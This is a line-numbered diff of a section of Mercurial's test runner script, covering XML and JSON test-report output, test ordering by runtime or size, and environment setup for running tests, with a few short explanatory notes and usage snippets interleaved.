2750 # See http://llg.cubic.org/docs/junit/ for a reference.
2750 # See http://llg.cubic.org/docs/junit/ for a reference.
2751 timesd = dict((t[0], t[3]) for t in result.times)
2751 timesd = dict((t[0], t[3]) for t in result.times)
2752 doc = minidom.Document()
2752 doc = minidom.Document()
2753 s = doc.createElement('testsuite')
2753 s = doc.createElement('testsuite')
2754 s.setAttribute('errors', "0") # TODO
2754 s.setAttribute('errors', "0") # TODO
2755 s.setAttribute('failures', str(len(result.failures)))
2755 s.setAttribute('failures', str(len(result.failures)))
2756 s.setAttribute('name', 'run-tests')
2756 s.setAttribute('name', 'run-tests')
2757 s.setAttribute(
2757 s.setAttribute(
2758 'skipped', str(len(result.skipped) + len(result.ignored))
2758 'skipped', str(len(result.skipped) + len(result.ignored))
2759 )
2759 )
2760 s.setAttribute('tests', str(result.testsRun))
2760 s.setAttribute('tests', str(result.testsRun))
2761 doc.appendChild(s)
2761 doc.appendChild(s)
2762 for tc in result.successes:
2762 for tc in result.successes:
2763 t = doc.createElement('testcase')
2763 t = doc.createElement('testcase')
2764 t.setAttribute('name', tc.name)
2764 t.setAttribute('name', tc.name)
2765 tctime = timesd.get(tc.name)
2765 tctime = timesd.get(tc.name)
2766 if tctime is not None:
2766 if tctime is not None:
2767 t.setAttribute('time', '%.3f' % tctime)
2767 t.setAttribute('time', '%.3f' % tctime)
2768 s.appendChild(t)
2768 s.appendChild(t)
2769 for tc, err in sorted(result.faildata.items()):
2769 for tc, err in sorted(result.faildata.items()):
2770 t = doc.createElement('testcase')
2770 t = doc.createElement('testcase')
2771 t.setAttribute('name', tc)
2771 t.setAttribute('name', tc)
2772 tctime = timesd.get(tc)
2772 tctime = timesd.get(tc)
2773 if tctime is not None:
2773 if tctime is not None:
2774 t.setAttribute('time', '%.3f' % tctime)
2774 t.setAttribute('time', '%.3f' % tctime)
2775 # createCDATASection expects a unicode or it will
2775 # createCDATASection expects a unicode or it will
2776 # convert using default conversion rules, which will
2776 # convert using default conversion rules, which will
2777 # fail if string isn't ASCII.
2777 # fail if string isn't ASCII.
2778 err = cdatasafe(err).decode('utf-8', 'replace')
2778 err = cdatasafe(err).decode('utf-8', 'replace')
2779 cd = doc.createCDATASection(err)
2779 cd = doc.createCDATASection(err)
2780 # Use 'failure' here instead of 'error' to match errors = 0,
2780 # Use 'failure' here instead of 'error' to match errors = 0,
2781 # failures = len(result.failures) in the testsuite element.
2781 # failures = len(result.failures) in the testsuite element.
2782 failelem = doc.createElement('failure')
2782 failelem = doc.createElement('failure')
2783 failelem.setAttribute('message', 'output changed')
2783 failelem.setAttribute('message', 'output changed')
2784 failelem.setAttribute('type', 'output-mismatch')
2784 failelem.setAttribute('type', 'output-mismatch')
2785 failelem.appendChild(cd)
2785 failelem.appendChild(cd)
2786 t.appendChild(failelem)
2786 t.appendChild(failelem)
2787 s.appendChild(t)
2787 s.appendChild(t)
2788 for tc, message in result.skipped:
2788 for tc, message in result.skipped:
2789 # According to the schema, 'skipped' has no attributes. So store
2789 # According to the schema, 'skipped' has no attributes. So store
2790 # the skip message as a text node instead.
2790 # the skip message as a text node instead.
2791 t = doc.createElement('testcase')
2791 t = doc.createElement('testcase')
2792 t.setAttribute('name', tc.name)
2792 t.setAttribute('name', tc.name)
2793 binmessage = message.encode('utf-8')
2793 binmessage = message.encode('utf-8')
2794 message = cdatasafe(binmessage).decode('utf-8', 'replace')
2794 message = cdatasafe(binmessage).decode('utf-8', 'replace')
2795 cd = doc.createCDATASection(message)
2795 cd = doc.createCDATASection(message)
2796 skipelem = doc.createElement('skipped')
2796 skipelem = doc.createElement('skipped')
2797 skipelem.appendChild(cd)
2797 skipelem.appendChild(cd)
2798 t.appendChild(skipelem)
2798 t.appendChild(skipelem)
2799 s.appendChild(t)
2799 s.appendChild(t)
2800 outf.write(doc.toprettyxml(indent=' ', encoding='utf-8'))
2800 outf.write(doc.toprettyxml(indent=' ', encoding='utf-8'))
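The file written above is conventional jUnit-style XML, so it can be inspected afterwards with the same minidom module; the path below is a placeholder for whatever was passed to --xunit.

# Illustrative sketch: summarize a previously written --xunit report.
from xml.dom import minidom

doc = minidom.parse('xunit.xml')  # placeholder path
suite = doc.getElementsByTagName('testsuite')[0]
print('tests=%s failures=%s skipped=%s' % (
    suite.getAttribute('tests'),
    suite.getAttribute('failures'),
    suite.getAttribute('skipped'),
))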
2801
2801
2802 @staticmethod
2802 @staticmethod
2803 def _writejson(result, outf):
2803 def _writejson(result, outf):
2804 timesd = {}
2804 timesd = {}
2805 for tdata in result.times:
2805 for tdata in result.times:
2806 test = tdata[0]
2806 test = tdata[0]
2807 timesd[test] = tdata[1:]
2807 timesd[test] = tdata[1:]
2808
2808
2809 outcome = {}
2809 outcome = {}
2810 groups = [
2810 groups = [
2811 ('success', ((tc, None) for tc in result.successes)),
2811 ('success', ((tc, None) for tc in result.successes)),
2812 ('failure', result.failures),
2812 ('failure', result.failures),
2813 ('skip', result.skipped),
2813 ('skip', result.skipped),
2814 ]
2814 ]
2815 for res, testcases in groups:
2815 for res, testcases in groups:
2816 for tc, __ in testcases:
2816 for tc, __ in testcases:
2817 if tc.name in timesd:
2817 if tc.name in timesd:
2818 diff = result.faildata.get(tc.name, b'')
2818 diff = result.faildata.get(tc.name, b'')
2819 try:
2819 try:
2820 diff = diff.decode('unicode_escape')
2820 diff = diff.decode('unicode_escape')
2821 except UnicodeDecodeError as e:
2821 except UnicodeDecodeError as e:
2822 diff = '%r decoding diff, sorry' % e
2822 diff = '%r decoding diff, sorry' % e
2823 tres = {
2823 tres = {
2824 'result': res,
2824 'result': res,
2825 'time': ('%0.3f' % timesd[tc.name][2]),
2825 'time': ('%0.3f' % timesd[tc.name][2]),
2826 'cuser': ('%0.3f' % timesd[tc.name][0]),
2826 'cuser': ('%0.3f' % timesd[tc.name][0]),
2827 'csys': ('%0.3f' % timesd[tc.name][1]),
2827 'csys': ('%0.3f' % timesd[tc.name][1]),
2828 'start': ('%0.3f' % timesd[tc.name][3]),
2828 'start': ('%0.3f' % timesd[tc.name][3]),
2829 'end': ('%0.3f' % timesd[tc.name][4]),
2829 'end': ('%0.3f' % timesd[tc.name][4]),
2830 'diff': diff,
2830 'diff': diff,
2831 }
2831 }
2832 else:
2832 else:
2833 # blacklisted test
2833 # blacklisted test
2834 tres = {'result': res}
2834 tres = {'result': res}
2835
2835
2836 outcome[tc.name] = tres
2836 outcome[tc.name] = tres
2837 jsonout = json.dumps(
2837 jsonout = json.dumps(
2838 outcome, sort_keys=True, indent=4, separators=(',', ': ')
2838 outcome, sort_keys=True, indent=4, separators=(',', ': ')
2839 )
2839 )
2840 outf.writelines(("testreport =", jsonout))
2840 outf.writelines(("testreport =", jsonout))
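Note that the file written here is not bare JSON: it is the literal prefix "testreport =" followed by a JSON object keyed by test name. A hedged sketch of reading it back, assuming the path of the report.json produced above:

# Illustrative only: strip the "testreport =" prefix and load the
# per-test outcome dictionary written by _writejson().
import json

with open('report.json') as fp:
    payload = fp.read()
report = json.loads(payload.split('=', 1)[1])
for name, outcome in sorted(report.items()):
    print(name, outcome['result'], outcome.get('time', '-'))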
2841
2841
2842
2842
2843 def sorttests(testdescs, previoustimes, shuffle=False):
2843 def sorttests(testdescs, previoustimes, shuffle=False):
2844 """Do an in-place sort of tests."""
2844 """Do an in-place sort of tests."""
2845 if shuffle:
2845 if shuffle:
2846 random.shuffle(testdescs)
2846 random.shuffle(testdescs)
2847 return
2847 return
2848
2848
2849 if previoustimes:
2849 if previoustimes:
2850
2850
2851 def sortkey(f):
2851 def sortkey(f):
2852 f = f['path']
2852 f = f['path']
2853 if f in previoustimes:
2853 if f in previoustimes:
2854 # Use most recent time as estimate
2854 # Use most recent time as estimate
2855 return -(previoustimes[f][-1])
2855 return -(previoustimes[f][-1])
2856 else:
2856 else:
2857 # Default to a rather arbitrary value of 1 second for new tests
2857 # Default to a rather arbitrary value of 1 second for new tests
2858 return -1.0
2858 return -1.0
2859
2859
2860 else:
2860 else:
2861 # keywords for slow tests
2861 # keywords for slow tests
2862 slow = {
2862 slow = {
2863 b'svn': 10,
2863 b'svn': 10,
2864 b'cvs': 10,
2864 b'cvs': 10,
2865 b'hghave': 10,
2865 b'hghave': 10,
2866 b'largefiles-update': 10,
2866 b'largefiles-update': 10,
2867 b'run-tests': 10,
2867 b'run-tests': 10,
2868 b'corruption': 10,
2868 b'corruption': 10,
2869 b'race': 10,
2869 b'race': 10,
2870 b'i18n': 10,
2870 b'i18n': 10,
2871 b'check': 100,
2871 b'check': 100,
2872 b'gendoc': 100,
2872 b'gendoc': 100,
2873 b'contrib-perf': 200,
2873 b'contrib-perf': 200,
2874 b'merge-combination': 100,
2874 b'merge-combination': 100,
2875 }
2875 }
2876 perf = {}
2876 perf = {}
2877
2877
2878 def sortkey(f):
2878 def sortkey(f):
2879 # run largest tests first, as they tend to take the longest
2879 # run largest tests first, as they tend to take the longest
2880 f = f['path']
2880 f = f['path']
2881 try:
2881 try:
2882 return perf[f]
2882 return perf[f]
2883 except KeyError:
2883 except KeyError:
2884 try:
2884 try:
2885 val = -os.stat(f).st_size
2885 val = -os.stat(f).st_size
2886 except OSError as e:
2886 except OSError as e:
2887 if e.errno != errno.ENOENT:
2887 if e.errno != errno.ENOENT:
2888 raise
2888 raise
2889 perf[f] = -1e9 # file does not exist, tell early
2889 perf[f] = -1e9 # file does not exist, tell early
2890 return -1e9
2890 return -1e9
2891 for kw, mul in slow.items():
2891 for kw, mul in slow.items():
2892 if kw in f:
2892 if kw in f:
2893 val *= mul
2893 val *= mul
2894 if f.endswith(b'.py'):
2894 if f.endswith(b'.py'):
2895 val /= 10.0
2895 val /= 10.0
2896 perf[f] = val / 1000.0
2896 perf[f] = val / 1000.0
2897 return perf[f]
2897 return perf[f]
2898
2898
2899 testdescs.sort(key=sortkey)
2899 testdescs.sort(key=sortkey)
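In other words, when previous timings are available the slowest known tests are scheduled first and unknown tests default to an assumed one-second runtime; otherwise the size-and-keyword heuristic above takes over. A small illustration under assumed inputs (paths and timings invented, and assuming sorttests is called from within this module):

# Illustrative usage of sorttests() with recorded timings: the test with
# the largest most-recent runtime is scheduled first.
descs = [{'path': b'test-a.t'}, {'path': b'test-b.t'}]
previous = {b'test-a.t': [1.0, 1.2], b'test-b.t': [4.0, 3.8]}
sorttests(descs, previous)
assert [d['path'] for d in descs] == [b'test-b.t', b'test-a.t']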
2900
2900
2901
2901
2902 class TestRunner(object):
2902 class TestRunner(object):
2903 """Holds context for executing tests.
2903 """Holds context for executing tests.
2904
2904
2905 Tests rely on a lot of state. This object holds it for them.
2905 Tests rely on a lot of state. This object holds it for them.
2906 """
2906 """
2907
2907
2908 # Programs required to run tests.
2908 # Programs required to run tests.
2909 REQUIREDTOOLS = [
2909 REQUIREDTOOLS = [
2910 b'diff',
2910 b'diff',
2911 b'grep',
2911 b'grep',
2912 b'unzip',
2912 b'unzip',
2913 b'gunzip',
2913 b'gunzip',
2914 b'bunzip2',
2914 b'bunzip2',
2915 b'sed',
2915 b'sed',
2916 ]
2916 ]
2917
2917
2918 # Maps file extensions to test class.
2918 # Maps file extensions to test class.
2919 TESTTYPES = [
2919 TESTTYPES = [
2920 (b'.py', PythonTest),
2920 (b'.py', PythonTest),
2921 (b'.t', TTest),
2921 (b'.t', TTest),
2922 ]
2922 ]
2923
2923
2924 def __init__(self):
2924 def __init__(self):
2925 self.options = None
2925 self.options = None
2926 self._hgroot = None
2926 self._hgroot = None
2927 self._testdir = None
2927 self._testdir = None
2928 self._outputdir = None
2928 self._outputdir = None
2929 self._hgtmp = None
2929 self._hgtmp = None
2930 self._installdir = None
2930 self._installdir = None
2931 self._bindir = None
2931 self._bindir = None
2932 self._tmpbinddir = None
2932 self._tmpbinddir = None
2933 self._pythondir = None
2933 self._pythondir = None
2934 self._coveragefile = None
2934 self._coveragefile = None
2935 self._createdfiles = []
2935 self._createdfiles = []
2936 self._hgcommand = None
2936 self._hgcommand = None
2937 self._hgpath = None
2937 self._hgpath = None
2938 self._portoffset = 0
2938 self._portoffset = 0
2939 self._ports = {}
2939 self._ports = {}
2940
2940
2941 def run(self, args, parser=None):
2941 def run(self, args, parser=None):
2942 """Run the test suite."""
2942 """Run the test suite."""
2943 oldmask = os.umask(0o22)
2943 oldmask = os.umask(0o22)
2944 try:
2944 try:
2945 parser = parser or getparser()
2945 parser = parser or getparser()
2946 options = parseargs(args, parser)
2946 options = parseargs(args, parser)
2947 tests = [_bytespath(a) for a in options.tests]
2947 tests = [_bytespath(a) for a in options.tests]
2948 if options.test_list is not None:
2948 if options.test_list is not None:
2949 for listfile in options.test_list:
2949 for listfile in options.test_list:
2950 with open(listfile, 'rb') as f:
2950 with open(listfile, 'rb') as f:
2951 tests.extend(t for t in f.read().splitlines() if t)
2951 tests.extend(t for t in f.read().splitlines() if t)
2952 self.options = options
2952 self.options = options
2953
2953
2954 self._checktools()
2954 self._checktools()
2955 testdescs = self.findtests(tests)
2955 testdescs = self.findtests(tests)
2956 if options.profile_runner:
2956 if options.profile_runner:
2957 import statprof
2957 import statprof
2958
2958
2959 statprof.start()
2959 statprof.start()
2960 result = self._run(testdescs)
2960 result = self._run(testdescs)
2961 if options.profile_runner:
2961 if options.profile_runner:
2962 statprof.stop()
2962 statprof.stop()
2963 statprof.display()
2963 statprof.display()
2964 return result
2964 return result
2965
2965
2966 finally:
2966 finally:
2967 os.umask(oldmask)
2967 os.umask(oldmask)
2968
2968
2969 def _run(self, testdescs):
2969 def _run(self, testdescs):
2970 testdir = getcwdb()
2970 testdir = getcwdb()
2971 self._testdir = osenvironb[b'TESTDIR'] = getcwdb()
2971 self._testdir = osenvironb[b'TESTDIR'] = getcwdb()
2972 # assume all tests in same folder for now
2972 # assume all tests in same folder for now
2973 if testdescs:
2973 if testdescs:
2974 pathname = os.path.dirname(testdescs[0]['path'])
2974 pathname = os.path.dirname(testdescs[0]['path'])
2975 if pathname:
2975 if pathname:
2976 testdir = os.path.join(testdir, pathname)
2976 testdir = os.path.join(testdir, pathname)
2977 self._testdir = osenvironb[b'TESTDIR'] = testdir
2977 self._testdir = osenvironb[b'TESTDIR'] = testdir
2978 if self.options.outputdir:
2978 if self.options.outputdir:
2979 self._outputdir = canonpath(_bytespath(self.options.outputdir))
2979 self._outputdir = canonpath(_bytespath(self.options.outputdir))
2980 else:
2980 else:
2981 self._outputdir = getcwdb()
2981 self._outputdir = getcwdb()
2982 if testdescs and pathname:
2982 if testdescs and pathname:
2983 self._outputdir = os.path.join(self._outputdir, pathname)
2983 self._outputdir = os.path.join(self._outputdir, pathname)
2984 previoustimes = {}
2984 previoustimes = {}
2985 if self.options.order_by_runtime:
2985 if self.options.order_by_runtime:
2986 previoustimes = dict(loadtimes(self._outputdir))
2986 previoustimes = dict(loadtimes(self._outputdir))
2987 sorttests(testdescs, previoustimes, shuffle=self.options.random)
2987 sorttests(testdescs, previoustimes, shuffle=self.options.random)
2988
2988
2989 if 'PYTHONHASHSEED' not in os.environ:
2989 if 'PYTHONHASHSEED' not in os.environ:
2990 # use a random python hash seed all the time
2990 # use a random python hash seed all the time
2991 # we generate the randomness ourselves so we know which seed is used
2991 # we generate the randomness ourselves so we know which seed is used
2992 os.environ['PYTHONHASHSEED'] = str(random.getrandbits(32))
2992 os.environ['PYTHONHASHSEED'] = str(random.getrandbits(32))
2993
2993
2994 if self.options.tmpdir:
2994 if self.options.tmpdir:
2995 self.options.keep_tmpdir = True
2995 self.options.keep_tmpdir = True
2996 tmpdir = _bytespath(self.options.tmpdir)
2996 tmpdir = _bytespath(self.options.tmpdir)
2997 if os.path.exists(tmpdir):
2997 if os.path.exists(tmpdir):
2998 # Meaning of tmpdir has changed since 1.3: we used to create
2998 # Meaning of tmpdir has changed since 1.3: we used to create
2999 # HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
2999 # HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
3000 # tmpdir already exists.
3000 # tmpdir already exists.
3001 print("error: temp dir %r already exists" % tmpdir)
3001 print("error: temp dir %r already exists" % tmpdir)
3002 return 1
3002 return 1
3003
3003
3004 os.makedirs(tmpdir)
3004 os.makedirs(tmpdir)
3005 else:
3005 else:
3006 d = None
3006 d = None
3007 if os.name == 'nt':
3007 if os.name == 'nt':
3008 # without this, we get the default temp dir location, but
3008 # without this, we get the default temp dir location, but
3009 # in all lowercase, which causes trouble with paths (issue3490)
3009 # in all lowercase, which causes trouble with paths (issue3490)
3010 d = osenvironb.get(b'TMP', None)
3010 d = osenvironb.get(b'TMP', None)
3011 tmpdir = tempfile.mkdtemp(b'', b'hgtests.', d)
3011 tmpdir = tempfile.mkdtemp(b'', b'hgtests.', d)
3012
3012
3013 self._hgtmp = osenvironb[b'HGTMP'] = os.path.realpath(tmpdir)
3013 self._hgtmp = osenvironb[b'HGTMP'] = os.path.realpath(tmpdir)
3014
3014
3015 if self.options.with_hg:
3015 if self.options.with_hg:
3016 self._installdir = None
3016 self._installdir = None
3017 whg = self.options.with_hg
3017 whg = self.options.with_hg
3018 self._bindir = os.path.dirname(os.path.realpath(whg))
3018 self._bindir = os.path.dirname(os.path.realpath(whg))
3019 assert isinstance(self._bindir, bytes)
3019 assert isinstance(self._bindir, bytes)
3020 self._hgcommand = os.path.basename(whg)
3020 self._hgcommand = os.path.basename(whg)
3021 self._tmpbindir = os.path.join(self._hgtmp, b'install', b'bin')
3021 self._tmpbindir = os.path.join(self._hgtmp, b'install', b'bin')
3022 os.makedirs(self._tmpbindir)
3022 os.makedirs(self._tmpbindir)
3023
3023
3024 normbin = os.path.normpath(os.path.abspath(whg))
3024 normbin = os.path.normpath(os.path.abspath(whg))
3025 normbin = normbin.replace(os.sep.encode('ascii'), b'/')
3025 normbin = normbin.replace(os.sep.encode('ascii'), b'/')
3026
3026
3027 # Other Python scripts in the test harness need to
3027 # Other Python scripts in the test harness need to
3028 # `import mercurial`. If `hg` is a Python script, we assume
3028 # `import mercurial`. If `hg` is a Python script, we assume
3029 # the Mercurial modules are relative to its path and tell the tests
3029 # the Mercurial modules are relative to its path and tell the tests
3030 # to load Python modules from its directory.
3030 # to load Python modules from its directory.
3031 with open(whg, 'rb') as fh:
3031 with open(whg, 'rb') as fh:
3032 initial = fh.read(1024)
3032 initial = fh.read(1024)
3033
3033
3034 if re.match(b'#!.*python', initial):
3034 if re.match(b'#!.*python', initial):
3035 self._pythondir = self._bindir
3035 self._pythondir = self._bindir
3036 # If it looks like our in-repo Rust binary, use the source root.
3036 # If it looks like our in-repo Rust binary, use the source root.
3037 # This is a bit hacky. But rhg is still not supported outside the
3037 # This is a bit hacky. But rhg is still not supported outside the
3038 # source directory. So until it is, do the simple thing.
3038 # source directory. So until it is, do the simple thing.
3039 elif re.search(b'/rust/target/[^/]+/hg', normbin):
3039 elif re.search(b'/rust/target/[^/]+/hg', normbin):
3040 self._pythondir = os.path.dirname(self._testdir)
3040 self._pythondir = os.path.dirname(self._testdir)
3041 # Fall back to the legacy behavior.
3041 # Fall back to the legacy behavior.
3042 else:
3042 else:
3043 self._pythondir = self._bindir
3043 self._pythondir = self._bindir
3044
3044
3045 else:
3045 else:
3046 self._installdir = os.path.join(self._hgtmp, b"install")
3046 self._installdir = os.path.join(self._hgtmp, b"install")
3047 self._bindir = os.path.join(self._installdir, b"bin")
3047 self._bindir = os.path.join(self._installdir, b"bin")
3048 self._hgcommand = b'hg'
3048 self._hgcommand = b'hg'
3049 self._tmpbindir = self._bindir
3049 self._tmpbindir = self._bindir
3050 self._pythondir = os.path.join(self._installdir, b"lib", b"python")
3050 self._pythondir = os.path.join(self._installdir, b"lib", b"python")
3051
3051
3052 # Force the use of hg.exe instead of relying on MSYS to recognize hg is
3052 # Force the use of hg.exe instead of relying on MSYS to recognize hg is
3053 # a python script and feed it to python.exe. Legacy stdio is force
3053 # a python script and feed it to python.exe. Legacy stdio is force
3054 # enabled by hg.exe, and this is a more realistic way to launch hg
3054 # enabled by hg.exe, and this is a more realistic way to launch hg
3055 # anyway.
3055 # anyway.
3056 if os.name == 'nt' and not self._hgcommand.endswith(b'.exe'):
3056 if os.name == 'nt' and not self._hgcommand.endswith(b'.exe'):
3057 self._hgcommand += b'.exe'
3057 self._hgcommand += b'.exe'
3058
3058
3059 # set CHGHG, then replace "hg" command by "chg"
3059 # set CHGHG, then replace "hg" command by "chg"
3060 chgbindir = self._bindir
3060 chgbindir = self._bindir
3061 if self.options.chg or self.options.with_chg:
3061 if self.options.chg or self.options.with_chg:
3062 osenvironb[b'CHGHG'] = os.path.join(self._bindir, self._hgcommand)
3062 osenvironb[b'CHGHG'] = os.path.join(self._bindir, self._hgcommand)
3063 else:
3063 else:
3064 osenvironb.pop(b'CHGHG', None) # drop flag for hghave
3064 osenvironb.pop(b'CHGHG', None) # drop flag for hghave
3065 if self.options.chg:
3065 if self.options.chg:
3066 self._hgcommand = b'chg'
3066 self._hgcommand = b'chg'
3067 elif self.options.with_chg:
3067 elif self.options.with_chg:
3068 chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
3068 chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
3069 self._hgcommand = os.path.basename(self.options.with_chg)
3069 self._hgcommand = os.path.basename(self.options.with_chg)
3070
3070
3071 osenvironb[b"BINDIR"] = self._bindir
3071 osenvironb[b"BINDIR"] = self._bindir
3072 osenvironb[b"PYTHON"] = PYTHON
3072 osenvironb[b"PYTHON"] = PYTHON
3073
3073
3074 fileb = _bytespath(__file__)
3074 fileb = _bytespath(__file__)
3075 runtestdir = os.path.abspath(os.path.dirname(fileb))
3075 runtestdir = os.path.abspath(os.path.dirname(fileb))
3076 osenvironb[b'RUNTESTDIR'] = runtestdir
3076 osenvironb[b'RUNTESTDIR'] = runtestdir
3077 if PYTHON3:
3077 if PYTHON3:
3078 sepb = _bytespath(os.pathsep)
3078 sepb = _bytespath(os.pathsep)
3079 else:
3079 else:
3080 sepb = os.pathsep
3080 sepb = os.pathsep
3081 path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
3081 path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
3082 if os.path.islink(__file__):
3082 if os.path.islink(__file__):
3083 # test helper will likely be at the end of the symlink
3083 # test helper will likely be at the end of the symlink
3084 realfile = os.path.realpath(fileb)
3084 realfile = os.path.realpath(fileb)
3085 realdir = os.path.abspath(os.path.dirname(realfile))
3085 realdir = os.path.abspath(os.path.dirname(realfile))
3086 path.insert(2, realdir)
3086 path.insert(2, realdir)
3087 if chgbindir != self._bindir:
3087 if chgbindir != self._bindir:
3088 path.insert(1, chgbindir)
3088 path.insert(1, chgbindir)
3089 if self._testdir != runtestdir:
3089 if self._testdir != runtestdir:
3090 path = [self._testdir] + path
3090 path = [self._testdir] + path
3091 if self._tmpbindir != self._bindir:
3091 if self._tmpbindir != self._bindir:
3092 path = [self._tmpbindir] + path
3092 path = [self._tmpbindir] + path
3093 osenvironb[b"PATH"] = sepb.join(path)
3093 osenvironb[b"PATH"] = sepb.join(path)
3094
3094
3095 # Include TESTDIR in PYTHONPATH so that out-of-tree extensions
3095 # Include TESTDIR in PYTHONPATH so that out-of-tree extensions
3096 # can run .../tests/run-tests.py test-foo where test-foo
3096 # can run .../tests/run-tests.py test-foo where test-foo
3097 # adds an extension to HGRC. Also include run-test.py directory to
3097 # adds an extension to HGRC. Also include run-test.py directory to
3098 # import modules like heredoctest.
3098 # import modules like heredoctest.
3099 pypath = [self._pythondir, self._testdir, runtestdir]
3099 pypath = [self._pythondir, self._testdir, runtestdir]
3100 # We have to augment PYTHONPATH, rather than simply replacing
3100 # We have to augment PYTHONPATH, rather than simply replacing
3101 # it, in case external libraries are only available via current
3101 # it, in case external libraries are only available via current
3102 # PYTHONPATH. (In particular, the Subversion bindings on OS X
3102 # PYTHONPATH. (In particular, the Subversion bindings on OS X
3103 # are in /opt/subversion.)
3103 # are in /opt/subversion.)
3104 oldpypath = osenvironb.get(IMPL_PATH)
3104 oldpypath = osenvironb.get(IMPL_PATH)
3105 if oldpypath:
3105 if oldpypath:
3106 pypath.append(oldpypath)
3106 pypath.append(oldpypath)
3107 osenvironb[IMPL_PATH] = sepb.join(pypath)
3107 osenvironb[IMPL_PATH] = sepb.join(pypath)
3108
3108
3109 if self.options.pure:
3109 if self.options.pure:
3110 os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
3110 os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
3111 os.environ["HGMODULEPOLICY"] = "py"
3111 os.environ["HGMODULEPOLICY"] = "py"
3112
3112
3113 if self.options.allow_slow_tests:
3113 if self.options.allow_slow_tests:
3114 os.environ["HGTEST_SLOW"] = "slow"
3114 os.environ["HGTEST_SLOW"] = "slow"
3115 elif 'HGTEST_SLOW' in os.environ:
3115 elif 'HGTEST_SLOW' in os.environ:
3116 del os.environ['HGTEST_SLOW']
3116 del os.environ['HGTEST_SLOW']
3117
3117
3118 self._coveragefile = os.path.join(self._testdir, b'.coverage')
3118 self._coveragefile = os.path.join(self._testdir, b'.coverage')
3119
3119
3120 if self.options.exceptions:
3120 if self.options.exceptions:
3121 exceptionsdir = os.path.join(self._outputdir, b'exceptions')
3121 exceptionsdir = os.path.join(self._outputdir, b'exceptions')
3122 try:
3122 try:
3123 os.makedirs(exceptionsdir)
3123 os.makedirs(exceptionsdir)
3124 except OSError as e:
3124 except OSError as e:
3125 if e.errno != errno.EEXIST:
3125 if e.errno != errno.EEXIST:
3126 raise
3126 raise
3127
3127
3128 # Remove all existing exception reports.
3128 # Remove all existing exception reports.
3129 for f in os.listdir(exceptionsdir):
3129 for f in os.listdir(exceptionsdir):
3130 os.unlink(os.path.join(exceptionsdir, f))
3130 os.unlink(os.path.join(exceptionsdir, f))
3131
3131
3132 osenvironb[b'HGEXCEPTIONSDIR'] = exceptionsdir
3132 osenvironb[b'HGEXCEPTIONSDIR'] = exceptionsdir
3133 logexceptions = os.path.join(self._testdir, b'logexceptions.py')
3133 logexceptions = os.path.join(self._testdir, b'logexceptions.py')
3134 self.options.extra_config_opt.append(
3134 self.options.extra_config_opt.append(
3135 'extensions.logexceptions=%s' % logexceptions.decode('utf-8')
3135 'extensions.logexceptions=%s' % logexceptions.decode('utf-8')
3136 )
3136 )
3137
3137
3138 vlog("# Using TESTDIR", _strpath(self._testdir))
3138 vlog("# Using TESTDIR", _strpath(self._testdir))
3139 vlog("# Using RUNTESTDIR", _strpath(osenvironb[b'RUNTESTDIR']))
3139 vlog("# Using RUNTESTDIR", _strpath(osenvironb[b'RUNTESTDIR']))
3140 vlog("# Using HGTMP", _strpath(self._hgtmp))
3140 vlog("# Using HGTMP", _strpath(self._hgtmp))
3141 vlog("# Using PATH", os.environ["PATH"])
3141 vlog("# Using PATH", os.environ["PATH"])
3142 vlog(
3142 vlog(
3143 "# Using", _strpath(IMPL_PATH), _strpath(osenvironb[IMPL_PATH]),
3143 "# Using", _strpath(IMPL_PATH), _strpath(osenvironb[IMPL_PATH]),
3144 )
3144 )
3145 vlog("# Writing to directory", _strpath(self._outputdir))
3145 vlog("# Writing to directory", _strpath(self._outputdir))
3146
3146
3147 try:
3147 try:
3148 return self._runtests(testdescs) or 0
3148 return self._runtests(testdescs) or 0
3149 finally:
3149 finally:
3150 time.sleep(0.1)
3150 time.sleep(0.1)
3151 self._cleanup()
3151 self._cleanup()
3152
3152
3153 def findtests(self, args):
3153 def findtests(self, args):
3154 """Finds possible test files from arguments.
3154 """Finds possible test files from arguments.
3155
3155
3156 If you wish to inject custom tests into the test harness, this would
3156 If you wish to inject custom tests into the test harness, this would
3157 be a good function to monkeypatch or override in a derived class.
3157 be a good function to monkeypatch or override in a derived class.
3158 """
3158 """
3159 if not args:
3159 if not args:
3160 if self.options.changed:
3160 if self.options.changed:
3161 proc = Popen4(
3161 proc = Popen4(
3162 b'hg st --rev "%s" -man0 .'
3162 b'hg st --rev "%s" -man0 .'
3163 % _bytespath(self.options.changed),
3163 % _bytespath(self.options.changed),
3164 None,
3164 None,
3165 0,
3165 0,
3166 )
3166 )
3167 stdout, stderr = proc.communicate()
3167 stdout, stderr = proc.communicate()
3168 args = stdout.strip(b'\0').split(b'\0')
3168 args = stdout.strip(b'\0').split(b'\0')
3169 else:
3169 else:
3170 args = os.listdir(b'.')
3170 args = os.listdir(b'.')
3171
3171
3172 expanded_args = []
3172 expanded_args = []
3173 for arg in args:
3173 for arg in args:
3174 if os.path.isdir(arg):
3174 if os.path.isdir(arg):
3175 if not arg.endswith(b'/'):
3175 if not arg.endswith(b'/'):
3176 arg += b'/'
3176 arg += b'/'
3177 expanded_args.extend([arg + a for a in os.listdir(arg)])
3177 expanded_args.extend([arg + a for a in os.listdir(arg)])
3178 else:
3178 else:
3179 expanded_args.append(arg)
3179 expanded_args.append(arg)
3180 args = expanded_args
3180 args = expanded_args
3181
3181
3182 testcasepattern = re.compile(
3182 testcasepattern = re.compile(br'([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-.#]+))')
3183 br'([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-\.#]+))'
3184 )
3185 tests = []
3183 tests = []
3186 for t in args:
3184 for t in args:
3187 case = []
3185 case = []
3188
3186
3189 if not (
3187 if not (
3190 os.path.basename(t).startswith(b'test-')
3188 os.path.basename(t).startswith(b'test-')
3191 and (t.endswith(b'.py') or t.endswith(b'.t'))
3189 and (t.endswith(b'.py') or t.endswith(b'.t'))
3192 ):
3190 ):
3193
3191
3194 m = testcasepattern.match(os.path.basename(t))
3192 m = testcasepattern.match(os.path.basename(t))
3195 if m is not None:
3193 if m is not None:
3196 t_basename, casestr = m.groups()
3194 t_basename, casestr = m.groups()
3197 t = os.path.join(os.path.dirname(t), t_basename)
3195 t = os.path.join(os.path.dirname(t), t_basename)
